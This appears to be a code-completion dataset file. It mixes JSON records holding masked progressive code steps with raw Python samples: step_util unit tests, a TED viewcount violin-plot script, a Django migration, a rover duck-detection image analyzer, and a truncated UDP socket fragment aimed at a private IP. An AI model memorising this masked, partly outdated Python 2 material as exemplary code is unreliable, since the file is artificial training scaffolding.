step_metadata but not cache it.\n self.assertEqual(None,\n step_util.GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 1)\n # Returns the valid step_metadata and cache it.\n self.assertEqual({\n 'canonical_step_name': 'step_name'\n }, step_util.GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n self.assertEqual({\n 'canonical_step_name': 'step_name'\n }, step_util.GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n\n @mock.patch.object(\n step_util,\n 'LegacyGetStepMetadata',\n return_value={'canonical_step_name': 'step_name'})\n def testLegacyGetCanonicalStep(self, _):\n self.assertEqual(\n 'step_name',\n step_util.LegacyGetCanonicalStepName('m', 'b', 200,\n 'step_name on a platform'))\n\n @parameterized.expand([({\n 'canonical_step_name': 'step_name'\n }, 'step_name'), (None, 'step_name'), ({\n 'a': 'b'\n }, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetCanonicalStepName(self, step_metadata, expected_canonical_step,\n mocked_get_step):\n mocked_get_step.return_value = step_metadata\n self.assertEqual(\n expected_canonical_step,\n step_util.GetCanonicalStepName(123, 'step_name (with patch)'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetCanonicalStepNamePartialMatch(self, mock_get_step_metadata):\n step_util.GetCanonicalStepName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetCanonicalStepName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @mock.patch.object(\n step_util,\n 'LegacyGetStepMetadata',\n return_value={'isolate_target_name': 'browser_tests'})\n def testLegacyGetIsolateTargetName(self, _):\n self.assertEqual(\n 'browser_tests',\n step_util.LegacyGetIsolateTargetName(\n 'm', 'b', 200, 'viz_browser_tests (with patch) on Android'))\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value=None)\n def testLegacyGetIsolateTargetNameStepMetadataIsNone(self, _):\n self.assertEqual(\n None,\n step_util.LegacyGetIsolateTargetName(\n 'm', 'b', 200, 'viz_browser_tests (with patch) on Android'))\n\n @mock.patch.object(\n step_util, 'LegacyGetStepMetadata', return_value={'a': 'b'})\n def testLegacyGetIsolateTargetNameIsolateTargetNameIsMissing(self, _):\n self.assertEqual(\n None,\n step_util.LegacyGetIsolateTargetName(\n 'm', 'b', 200, 'viz_browser_tests (with patch) on Android'))\n\n @parameterized.expand([({\n 'isolate_target_name': 'isolate_target'\n }, 'isolate_target'), (None, None), ({\n 'a': 'b'\n }, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetName(self, step_metadata, expected_isolate_target,\n mocked_get_stepmeta):\n mocked_get_stepmeta.return_value = step_metadata\n self.assertEqual(expected_isolate_target,\n step_util.GetIsolateTargetName(123, 'full step name'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetPartialMatch(self, mock_get_step_metadata):\n step_util.GetIsolateTargetName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetIsolateTargetName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @parameterized.expand([(wf_testcase.SAMPLE_STEP_METADATA, 'platform'),\n (None, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetOS(self, mock_fn_return, expected_platform, mock_fn):\n mock_fn.return_value = mock_fn_return\n self.assertEqual(expected_platform,\n step_util.GetOS(123, 'builder_name', 'step_name'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetOSPartialMatch(self, mock_get_step_metadata):\n step_util.GetOS(123, 'builder_name', 'step_name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetOS(123, 'builder_name', 'step_name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @mock.patch.object(\n step_util,\n 'GetStepMetadata',\n return_value=wf_testcase.SAMPLE_STEP_METADATA)\n def testGetOSCached(self, mock_fn):\n self.assertEqual('platform',\n step_util.GetOS(123, 'builder_name', 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n self.assertEqual('platform',\n step_util.GetOS(123, 'builder_name', 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n\n def testGetStepStartAndEndTime(self):\n build_id = '8945610992972640896'\n start_time = datetime.datetime(2019, 3, 6)\n end_time = datetime.datetime(2019, 3, 6, 0, 0, 10)\n step = Step()\n step.name = 's'\n step.start_time.FromDatetime(start_time)\n step.end_time.FromDatetime(end_time)\n build = Build()\n build.id = int(build_id)\n build.steps.extend([step])\n\n self.assertEqual((start_time, end_time),\n step_util.GetStepStartAndEndTime(build, 's'))\n self.assertEqual((None, None), step_util.GetStepStartAndEndTime(\n build, 's2'))\n",
"step-ids": [
26,
32,
43,
49,
55
]
}
|
[
26,
32,
43,
49,
55
] |
import datetime
import matplotlib.pyplot as plt
import numpy as np
import statsmodels.api as sm
import xlrd
from pandas import *
from xlrd import xldate
#since I messed up when first scraping the data, I have the dates and viewcounts in separate files
#need to create a dictionary of 'author-title':[viewcount, date]
viewcount_dict = {}
#to get the viewcount
workbook = xlrd.open_workbook('ted_info.xlsx')
worksheet = workbook.sheet_by_name('Sheet1')
num_rows = worksheet.nrows - 1
num_cells = worksheet.ncols - 1
curr_row = 0
while curr_row < num_rows:
curr_row += 1
row = worksheet.row(curr_row)
print 'Row:', curr_row
author_name = worksheet.cell_value(curr_row, 0)
talk_title = worksheet.cell_value(curr_row, 3)
viewcount = worksheet.cell_value(curr_row, 5)
if author_name + ":" + talk_title in viewcount_dict:
print author_name + ":" + talk_title
raise "error in datafile, there is a duplicate"
viewcount_dict[author_name + ":" + talk_title] = [viewcount]
#the following prints each cell value and cell type
#curr_cell = -1
#while curr_cell < num_cells:
#curr_cell += 1
# Cell Types: 0=Empty, 1=Text, 2=Number, 3=Date, 4=Boolean, 5=Error, 6=Blank
#cell_type = worksheet.cell_type(curr_row, curr_cell)
#cell_value = worksheet.cell_value(curr_row, curr_cell)
#print ' ', cell_type, ':', cell_value
#to get the year
workbook = xlrd.open_workbook('ted_info_name_title_date.xlsx')
worksheet = workbook.sheet_by_name('Sheet1')
num_rows = worksheet.nrows - 1
num_cells = worksheet.ncols - 1
curr_row = 0
while curr_row < num_rows:
curr_row += 1
row = worksheet.row(curr_row)
author_name = worksheet.cell_value(curr_row, 0)
talk_title = worksheet.cell_value(curr_row, 1)
date = worksheet.cell_value(curr_row, 2)
date_as_datetime = xldate.xldate_as_tuple(date, workbook.datemode)
year, month, day, hour, minute, second = date_as_datetime
print year
try:
viewcount_dict[author_name + ":" + talk_title].append(year)
except:
#author/title not in dictionary (because it was one of the weirdly formatted pages)
print row
continue
print len(viewcount_dict)
year_viewcount_dict = {}
for year in range(2006,2016):
#create a dictionary for each year due to the input of the violin plot
year_viewcount_dict[year] = {}
year_viewcount_dict["All"] = {} #also have one that includes all years
for key, value in viewcount_dict.iteritems():
#print value
try:
year = value[1]
except:
continue
#this means that it did not have a year, likely because that author/talk was not in the date file
viewcount = value[0]
year_viewcount_dict[year][len(year_viewcount_dict[value[1]])] = viewcount
year_viewcount_dict["All"][len(year_viewcount_dict[value[1]])] = viewcount
list_of_counts = [Series(year_viewcount_dict[year]) for year in ["All"] + range(2006,2016)] #turn into data type required for violinplot
labels = ["All"] + [str(year) for year in range(2006, 2016)] #note that they started in June of 2006 and that this data only invludes up to april 2015
plt.rcParams['figure.subplot.bottom'] = 0.23 # keep labels visible
fig = plt.figure()
ax = fig.add_subplot(111)
sm.graphics.violinplot(list_of_counts, ax=ax, labels=labels,
plot_opts={'cutoff_val':5, 'cutoff_type':'abs',
'label_fontsize':'small'})
ax.set_xlabel("Year")
ax.set_yscale("log") #set to log scale because the range of viewcounts
ax.set_ylabel("Viewcount of talks (log scale)")
#plt.show()
plt.savefig('violinplot_viewcounts.png', bbox_inches='tight')
|
normal
|
{
"blob_id": "6ece524c82521b175cc7791e22c8249dd24dc714",
"index": 2281,
"step-1": "import datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport statsmodels.api as sm\nimport xlrd\nfrom pandas import *\nfrom xlrd import xldate\n\n\n#since I messed up when first scraping the data, I have the dates and viewcounts in separate files\n\n#need to create a dictionary of 'author-title':[viewcount, date]\nviewcount_dict = {}\n\n\n#to get the viewcount\nworkbook = xlrd.open_workbook('ted_info.xlsx')\nworksheet = workbook.sheet_by_name('Sheet1')\nnum_rows = worksheet.nrows - 1\nnum_cells = worksheet.ncols - 1\ncurr_row = 0\nwhile curr_row < num_rows:\n curr_row += 1\n row = worksheet.row(curr_row)\n print 'Row:', curr_row\n\n author_name = worksheet.cell_value(curr_row, 0)\n talk_title = worksheet.cell_value(curr_row, 3)\n viewcount = worksheet.cell_value(curr_row, 5)\n\n if author_name + \":\" + talk_title in viewcount_dict:\n print author_name + \":\" + talk_title\n raise \"error in datafile, there is a duplicate\"\n\n viewcount_dict[author_name + \":\" + talk_title] = [viewcount]\n\n #the following prints each cell value and cell type\n #curr_cell = -1\n #while curr_cell < num_cells:\n #curr_cell += 1\n # Cell Types: 0=Empty, 1=Text, 2=Number, 3=Date, 4=Boolean, 5=Error, 6=Blank\n #cell_type = worksheet.cell_type(curr_row, curr_cell)\n #cell_value = worksheet.cell_value(curr_row, curr_cell)\n #print ' ', cell_type, ':', cell_value\n\n\n#to get the year\nworkbook = xlrd.open_workbook('ted_info_name_title_date.xlsx')\nworksheet = workbook.sheet_by_name('Sheet1')\nnum_rows = worksheet.nrows - 1\nnum_cells = worksheet.ncols - 1\ncurr_row = 0\nwhile curr_row < num_rows:\n curr_row += 1\n row = worksheet.row(curr_row)\n\n author_name = worksheet.cell_value(curr_row, 0)\n talk_title = worksheet.cell_value(curr_row, 1)\n date = worksheet.cell_value(curr_row, 2)\n date_as_datetime = xldate.xldate_as_tuple(date, workbook.datemode)\n year, month, day, hour, minute, second = date_as_datetime\n print year\n\n try:\n viewcount_dict[author_name + \":\" + talk_title].append(year)\n except:\n #author/title not in dictionary (because it was one of the weirdly formatted pages)\n print row\n continue\n\n\nprint len(viewcount_dict)\n\n\nyear_viewcount_dict = {}\nfor year in range(2006,2016):\n #create a dictionary for each year due to the input of the violin plot \n year_viewcount_dict[year] = {}\nyear_viewcount_dict[\"All\"] = {} #also have one that includes all years\n\nfor key, value in viewcount_dict.iteritems():\n #print value\n try:\n year = value[1]\n except:\n continue\n #this means that it did not have a year, likely because that author/talk was not in the date file\n viewcount = value[0]\n year_viewcount_dict[year][len(year_viewcount_dict[value[1]])] = viewcount\n year_viewcount_dict[\"All\"][len(year_viewcount_dict[value[1]])] = viewcount\n\nlist_of_counts = [Series(year_viewcount_dict[year]) for year in [\"All\"] + range(2006,2016)] #turn into data type required for violinplot\n\n\nlabels = [\"All\"] + [str(year) for year in range(2006, 2016)] #note that they started in June of 2006 and that this data only invludes up to april 2015\nplt.rcParams['figure.subplot.bottom'] = 0.23 # keep labels visible\nfig = plt.figure()\nax = fig.add_subplot(111)\nsm.graphics.violinplot(list_of_counts, ax=ax, labels=labels,\n plot_opts={'cutoff_val':5, 'cutoff_type':'abs',\n 'label_fontsize':'small'})\nax.set_xlabel(\"Year\")\nax.set_yscale(\"log\") #set to log scale because the range of viewcounts\nax.set_ylabel(\"Viewcount of talks (log scale)\")\n\n#plt.show()\nplt.savefig('violinplot_viewcounts.png', bbox_inches='tight')\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Generated by Django 3.0.1 on 2020-02-01 16:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shopUser', '0024_order_contact'),
]
operations = [
migrations.AddField(
model_name='order',
name='location',
field=models.CharField(default='dhaka,Mohammadpur', max_length=200),
preserve_default=False,
),
]
|
normal
|
{
"blob_id": "0a5570ef17efa26ef6317930df616c8326f83314",
"index": 2936,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('shopUser', '0024_order_contact')]\n operations = [migrations.AddField(model_name='order', name='location',\n field=models.CharField(default='dhaka,Mohammadpur', max_length=200),\n preserve_default=False)]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('shopUser', '0024_order_contact')]\n operations = [migrations.AddField(model_name='order', name='location',\n field=models.CharField(default='dhaka,Mohammadpur', max_length=200),\n preserve_default=False)]\n",
"step-5": "# Generated by Django 3.0.1 on 2020-02-01 16:38\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('shopUser', '0024_order_contact'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='location',\n field=models.CharField(default='dhaka,Mohammadpur', max_length=200),\n preserve_default=False,\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import requests,cv2,numpy,time,imutils
class imageAnalyzer():
def __init__(self,
roverName="Rover03",
url="http://192.168.1.10:5000/api/",
temp_img_path = "./temp",
):
self.url = url + roverName
self.temp_img_path = temp_img_path
def getImage(self,img_number): # gets image from camera and saves it as temp(img_number).jpeg
temp = open(self.temp_img_path + str(img_number) + ".jpeg", "wb")
img = requests.get(self.url + "/image")
temp.write(img.content)
temp.close()
def analyzeHSV(self,img_number,thresholds=(numpy.array([20,100,110]),numpy.array([40,255,255]))): # min, max, creates mask from HSV thresholds
img = cv2.imread(self.temp_img_path + str(img_number) + ".jpeg")
orig = numpy.copy(img)
try:
img = cv2.GaussianBlur(img,(7,7),8)
except:
pass
hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
ret = cv2.inRange(hsv, thresholds[0],thresholds[1])
return ret,orig
def findBoundingBoxes(self,img,orig=None,area_thresh=100,aspect_thresh=[0.8,1.0],y_threshold=[0,0.6]): # finds contours from mask and determines bound boxes, vetoes by minimum box area, aspect ratio and vertical screen portion
con = cv2.findContours(img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
con = imutils.grab_contours(con)
if orig.any():
cv2.drawContours(orig, con, -1, (255, 255, 255),thickness=2)
bound = []
for c in con:
bound.append(cv2.boundingRect(c))
bound = list(filter(lambda x: (x[2]*x[3] >= area_thresh) and (aspect_thresh[0] <= x[3]/x[2] <= aspect_thresh[1]) and 480*y_threshold[0] <= 480-x[1] <= 480*y_threshold[1], bound)) # vetoing based on minimal bounding box area, relative position in image and aspect ratio
for b in bound:
cv2.rectangle(orig,b,color=(0,0,255),thickness=2)
cv2.imwrite("vis{}.jpg".format(0),orig)
return bound
def approx_distance(self,duckie_boxes,dist_half_screen=5,camera_y_res=480): # bounding boxes of ducks, calibration: distance in cm from camera to center of duck for duck to take up half of camera image height assuming duck size = const.
distances = {}
print(duckie_boxes)
for box in duckie_boxes:
distances[box] = round(dist_half_screen*(1/2)*(camera_y_res/box[3]))
distances = [ (box, round(dist_half_screen*(1/2)*(camera_y_res/box[3]) ) ) for box in duckie_boxes] # NOTE: Y coordinate origin is from the top of the image, returns list of (rect=(x_anchor,y_anchor,x_size,y_size),distance) tuple-value pairs (note,y_size goes downwards!)
return distances
def capture(self,temp_image=0,db_file="temp_duck_boxes.txt"): # gets image, returns bounding boxes and distances according to NOTE, creates temp images temp(n) and vis(n) with n = temp_image argument as well as distance text file
self.getImage(temp_image)
ret = self.analyzeHSV(temp_image)
boxes = self.findBoundingBoxes(ret[0], ret[1])
duck_box_file = open(db_file, "w")
dist = analyzer.approx_distance(boxes)
duck_box_file.write(str(dist))
duck_box_file.close()
return boxes, dist
analyzer = imageAnalyzer()
while True:
boxes, dist = analyzer.capture()
time.sleep(0.5)
|
normal
|
{
"blob_id": "7d3264e9a90ebd72439f77983cbf4f9755048a85",
"index": 4300,
"step-1": "<mask token>\n\n\nclass imageAnalyzer:\n <mask token>\n\n def getImage(self, img_number):\n temp = open(self.temp_img_path + str(img_number) + '.jpeg', 'wb')\n img = requests.get(self.url + '/image')\n temp.write(img.content)\n temp.close()\n\n def analyzeHSV(self, img_number, thresholds=(numpy.array([20, 100, 110]\n ), numpy.array([40, 255, 255]))):\n img = cv2.imread(self.temp_img_path + str(img_number) + '.jpeg')\n orig = numpy.copy(img)\n try:\n img = cv2.GaussianBlur(img, (7, 7), 8)\n except:\n pass\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n ret = cv2.inRange(hsv, thresholds[0], thresholds[1])\n return ret, orig\n\n def findBoundingBoxes(self, img, orig=None, area_thresh=100,\n aspect_thresh=[0.8, 1.0], y_threshold=[0, 0.6]):\n con = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n con = imutils.grab_contours(con)\n if orig.any():\n cv2.drawContours(orig, con, -1, (255, 255, 255), thickness=2)\n bound = []\n for c in con:\n bound.append(cv2.boundingRect(c))\n bound = list(filter(lambda x: x[2] * x[3] >= area_thresh and \n aspect_thresh[0] <= x[3] / x[2] <= aspect_thresh[1] and 480 *\n y_threshold[0] <= 480 - x[1] <= 480 * y_threshold[1], bound))\n for b in bound:\n cv2.rectangle(orig, b, color=(0, 0, 255), thickness=2)\n cv2.imwrite('vis{}.jpg'.format(0), orig)\n return bound\n\n def approx_distance(self, duckie_boxes, dist_half_screen=5,\n camera_y_res=480):\n distances = {}\n print(duckie_boxes)\n for box in duckie_boxes:\n distances[box] = round(dist_half_screen * (1 / 2) * (\n camera_y_res / box[3]))\n distances = [(box, round(dist_half_screen * (1 / 2) * (camera_y_res /\n box[3]))) for box in duckie_boxes]\n return distances\n\n def capture(self, temp_image=0, db_file='temp_duck_boxes.txt'):\n self.getImage(temp_image)\n ret = self.analyzeHSV(temp_image)\n boxes = self.findBoundingBoxes(ret[0], ret[1])\n duck_box_file = open(db_file, 'w')\n dist = analyzer.approx_distance(boxes)\n duck_box_file.write(str(dist))\n duck_box_file.close()\n return boxes, dist\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass imageAnalyzer:\n\n def __init__(self, roverName='Rover03', url=\n 'http://192.168.1.10:5000/api/', temp_img_path='./temp'):\n self.url = url + roverName\n self.temp_img_path = temp_img_path\n\n def getImage(self, img_number):\n temp = open(self.temp_img_path + str(img_number) + '.jpeg', 'wb')\n img = requests.get(self.url + '/image')\n temp.write(img.content)\n temp.close()\n\n def analyzeHSV(self, img_number, thresholds=(numpy.array([20, 100, 110]\n ), numpy.array([40, 255, 255]))):\n img = cv2.imread(self.temp_img_path + str(img_number) + '.jpeg')\n orig = numpy.copy(img)\n try:\n img = cv2.GaussianBlur(img, (7, 7), 8)\n except:\n pass\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n ret = cv2.inRange(hsv, thresholds[0], thresholds[1])\n return ret, orig\n\n def findBoundingBoxes(self, img, orig=None, area_thresh=100,\n aspect_thresh=[0.8, 1.0], y_threshold=[0, 0.6]):\n con = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n con = imutils.grab_contours(con)\n if orig.any():\n cv2.drawContours(orig, con, -1, (255, 255, 255), thickness=2)\n bound = []\n for c in con:\n bound.append(cv2.boundingRect(c))\n bound = list(filter(lambda x: x[2] * x[3] >= area_thresh and \n aspect_thresh[0] <= x[3] / x[2] <= aspect_thresh[1] and 480 *\n y_threshold[0] <= 480 - x[1] <= 480 * y_threshold[1], bound))\n for b in bound:\n cv2.rectangle(orig, b, color=(0, 0, 255), thickness=2)\n cv2.imwrite('vis{}.jpg'.format(0), orig)\n return bound\n\n def approx_distance(self, duckie_boxes, dist_half_screen=5,\n camera_y_res=480):\n distances = {}\n print(duckie_boxes)\n for box in duckie_boxes:\n distances[box] = round(dist_half_screen * (1 / 2) * (\n camera_y_res / box[3]))\n distances = [(box, round(dist_half_screen * (1 / 2) * (camera_y_res /\n box[3]))) for box in duckie_boxes]\n return distances\n\n def capture(self, temp_image=0, db_file='temp_duck_boxes.txt'):\n self.getImage(temp_image)\n ret = self.analyzeHSV(temp_image)\n boxes = self.findBoundingBoxes(ret[0], ret[1])\n duck_box_file = open(db_file, 'w')\n dist = analyzer.approx_distance(boxes)\n duck_box_file.write(str(dist))\n duck_box_file.close()\n return boxes, dist\n\n\n<mask token>\nwhile True:\n boxes, dist = analyzer.capture()\n time.sleep(0.5)\n",
"step-3": "<mask token>\n\n\nclass imageAnalyzer:\n\n def __init__(self, roverName='Rover03', url=\n 'http://192.168.1.10:5000/api/', temp_img_path='./temp'):\n self.url = url + roverName\n self.temp_img_path = temp_img_path\n\n def getImage(self, img_number):\n temp = open(self.temp_img_path + str(img_number) + '.jpeg', 'wb')\n img = requests.get(self.url + '/image')\n temp.write(img.content)\n temp.close()\n\n def analyzeHSV(self, img_number, thresholds=(numpy.array([20, 100, 110]\n ), numpy.array([40, 255, 255]))):\n img = cv2.imread(self.temp_img_path + str(img_number) + '.jpeg')\n orig = numpy.copy(img)\n try:\n img = cv2.GaussianBlur(img, (7, 7), 8)\n except:\n pass\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n ret = cv2.inRange(hsv, thresholds[0], thresholds[1])\n return ret, orig\n\n def findBoundingBoxes(self, img, orig=None, area_thresh=100,\n aspect_thresh=[0.8, 1.0], y_threshold=[0, 0.6]):\n con = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n con = imutils.grab_contours(con)\n if orig.any():\n cv2.drawContours(orig, con, -1, (255, 255, 255), thickness=2)\n bound = []\n for c in con:\n bound.append(cv2.boundingRect(c))\n bound = list(filter(lambda x: x[2] * x[3] >= area_thresh and \n aspect_thresh[0] <= x[3] / x[2] <= aspect_thresh[1] and 480 *\n y_threshold[0] <= 480 - x[1] <= 480 * y_threshold[1], bound))\n for b in bound:\n cv2.rectangle(orig, b, color=(0, 0, 255), thickness=2)\n cv2.imwrite('vis{}.jpg'.format(0), orig)\n return bound\n\n def approx_distance(self, duckie_boxes, dist_half_screen=5,\n camera_y_res=480):\n distances = {}\n print(duckie_boxes)\n for box in duckie_boxes:\n distances[box] = round(dist_half_screen * (1 / 2) * (\n camera_y_res / box[3]))\n distances = [(box, round(dist_half_screen * (1 / 2) * (camera_y_res /\n box[3]))) for box in duckie_boxes]\n return distances\n\n def capture(self, temp_image=0, db_file='temp_duck_boxes.txt'):\n self.getImage(temp_image)\n ret = self.analyzeHSV(temp_image)\n boxes = self.findBoundingBoxes(ret[0], ret[1])\n duck_box_file = open(db_file, 'w')\n dist = analyzer.approx_distance(boxes)\n duck_box_file.write(str(dist))\n duck_box_file.close()\n return boxes, dist\n\n\nanalyzer = imageAnalyzer()\nwhile True:\n boxes, dist = analyzer.capture()\n time.sleep(0.5)\n",
"step-4": "import requests, cv2, numpy, time, imutils\n\n\nclass imageAnalyzer:\n\n def __init__(self, roverName='Rover03', url=\n 'http://192.168.1.10:5000/api/', temp_img_path='./temp'):\n self.url = url + roverName\n self.temp_img_path = temp_img_path\n\n def getImage(self, img_number):\n temp = open(self.temp_img_path + str(img_number) + '.jpeg', 'wb')\n img = requests.get(self.url + '/image')\n temp.write(img.content)\n temp.close()\n\n def analyzeHSV(self, img_number, thresholds=(numpy.array([20, 100, 110]\n ), numpy.array([40, 255, 255]))):\n img = cv2.imread(self.temp_img_path + str(img_number) + '.jpeg')\n orig = numpy.copy(img)\n try:\n img = cv2.GaussianBlur(img, (7, 7), 8)\n except:\n pass\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n ret = cv2.inRange(hsv, thresholds[0], thresholds[1])\n return ret, orig\n\n def findBoundingBoxes(self, img, orig=None, area_thresh=100,\n aspect_thresh=[0.8, 1.0], y_threshold=[0, 0.6]):\n con = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n con = imutils.grab_contours(con)\n if orig.any():\n cv2.drawContours(orig, con, -1, (255, 255, 255), thickness=2)\n bound = []\n for c in con:\n bound.append(cv2.boundingRect(c))\n bound = list(filter(lambda x: x[2] * x[3] >= area_thresh and \n aspect_thresh[0] <= x[3] / x[2] <= aspect_thresh[1] and 480 *\n y_threshold[0] <= 480 - x[1] <= 480 * y_threshold[1], bound))\n for b in bound:\n cv2.rectangle(orig, b, color=(0, 0, 255), thickness=2)\n cv2.imwrite('vis{}.jpg'.format(0), orig)\n return bound\n\n def approx_distance(self, duckie_boxes, dist_half_screen=5,\n camera_y_res=480):\n distances = {}\n print(duckie_boxes)\n for box in duckie_boxes:\n distances[box] = round(dist_half_screen * (1 / 2) * (\n camera_y_res / box[3]))\n distances = [(box, round(dist_half_screen * (1 / 2) * (camera_y_res /\n box[3]))) for box in duckie_boxes]\n return distances\n\n def capture(self, temp_image=0, db_file='temp_duck_boxes.txt'):\n self.getImage(temp_image)\n ret = self.analyzeHSV(temp_image)\n boxes = self.findBoundingBoxes(ret[0], ret[1])\n duck_box_file = open(db_file, 'w')\n dist = analyzer.approx_distance(boxes)\n duck_box_file.write(str(dist))\n duck_box_file.close()\n return boxes, dist\n\n\nanalyzer = imageAnalyzer()\nwhile True:\n boxes, dist = analyzer.capture()\n time.sleep(0.5)\n",
"step-5": "import requests,cv2,numpy,time,imutils\r\n\r\nclass imageAnalyzer():\r\n\r\n def __init__(self,\r\n roverName=\"Rover03\",\r\n url=\"http://192.168.1.10:5000/api/\",\r\n temp_img_path = \"./temp\",\r\n ):\r\n\r\n self.url = url + roverName\r\n\r\n self.temp_img_path = temp_img_path\r\n\r\n def getImage(self,img_number): # gets image from camera and saves it as temp(img_number).jpeg\r\n\r\n temp = open(self.temp_img_path + str(img_number) + \".jpeg\", \"wb\")\r\n\r\n img = requests.get(self.url + \"/image\")\r\n\r\n temp.write(img.content)\r\n\r\n temp.close()\r\n\r\n def analyzeHSV(self,img_number,thresholds=(numpy.array([20,100,110]),numpy.array([40,255,255]))): # min, max, creates mask from HSV thresholds\r\n\r\n img = cv2.imread(self.temp_img_path + str(img_number) + \".jpeg\")\r\n\r\n orig = numpy.copy(img)\r\n\r\n try:\r\n\r\n img = cv2.GaussianBlur(img,(7,7),8)\r\n\r\n except:\r\n\r\n pass\r\n\r\n hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\r\n\r\n ret = cv2.inRange(hsv, thresholds[0],thresholds[1])\r\n\r\n return ret,orig\r\n\r\n def findBoundingBoxes(self,img,orig=None,area_thresh=100,aspect_thresh=[0.8,1.0],y_threshold=[0,0.6]): # finds contours from mask and determines bound boxes, vetoes by minimum box area, aspect ratio and vertical screen portion\r\n\r\n con = cv2.findContours(img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n con = imutils.grab_contours(con)\r\n\r\n if orig.any():\r\n\r\n cv2.drawContours(orig, con, -1, (255, 255, 255),thickness=2)\r\n\r\n bound = []\r\n\r\n for c in con:\r\n\r\n bound.append(cv2.boundingRect(c))\r\n\r\n bound = list(filter(lambda x: (x[2]*x[3] >= area_thresh) and (aspect_thresh[0] <= x[3]/x[2] <= aspect_thresh[1]) and 480*y_threshold[0] <= 480-x[1] <= 480*y_threshold[1], bound)) # vetoing based on minimal bounding box area, relative position in image and aspect ratio\r\n\r\n for b in bound:\r\n\r\n cv2.rectangle(orig,b,color=(0,0,255),thickness=2)\r\n\r\n cv2.imwrite(\"vis{}.jpg\".format(0),orig)\r\n\r\n return bound\r\n\r\n def approx_distance(self,duckie_boxes,dist_half_screen=5,camera_y_res=480): # bounding boxes of ducks, calibration: distance in cm from camera to center of duck for duck to take up half of camera image height assuming duck size = const.\r\n\r\n distances = {}\r\n\r\n print(duckie_boxes)\r\n\r\n for box in duckie_boxes:\r\n\r\n distances[box] = round(dist_half_screen*(1/2)*(camera_y_res/box[3]))\r\n\r\n distances = [ (box, round(dist_half_screen*(1/2)*(camera_y_res/box[3]) ) ) for box in duckie_boxes] # NOTE: Y coordinate origin is from the top of the image, returns list of (rect=(x_anchor,y_anchor,x_size,y_size),distance) tuple-value pairs (note,y_size goes downwards!)\r\n\r\n return distances\r\n\r\n def capture(self,temp_image=0,db_file=\"temp_duck_boxes.txt\"): # gets image, returns bounding boxes and distances according to NOTE, creates temp images temp(n) and vis(n) with n = temp_image argument as well as distance text file\r\n\r\n self.getImage(temp_image)\r\n\r\n ret = self.analyzeHSV(temp_image)\r\n\r\n boxes = self.findBoundingBoxes(ret[0], ret[1])\r\n\r\n duck_box_file = open(db_file, \"w\")\r\n\r\n dist = analyzer.approx_distance(boxes)\r\n\r\n duck_box_file.write(str(dist))\r\n\r\n duck_box_file.close()\r\n\r\n return boxes, dist\r\n\r\n\r\nanalyzer = imageAnalyzer()\r\n\r\nwhile True:\r\n\r\n boxes, dist = analyzer.capture()\r\n\r\n time.sleep(0.5)\r\n\r\n\r\n\r\n",
"step-ids": [
6,
8,
9,
10,
11
]
}
|
[
6,
8,
9,
10,
11
] |
#!/usr/bin/python
import socket
import sys
host = '10.211.55.5'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
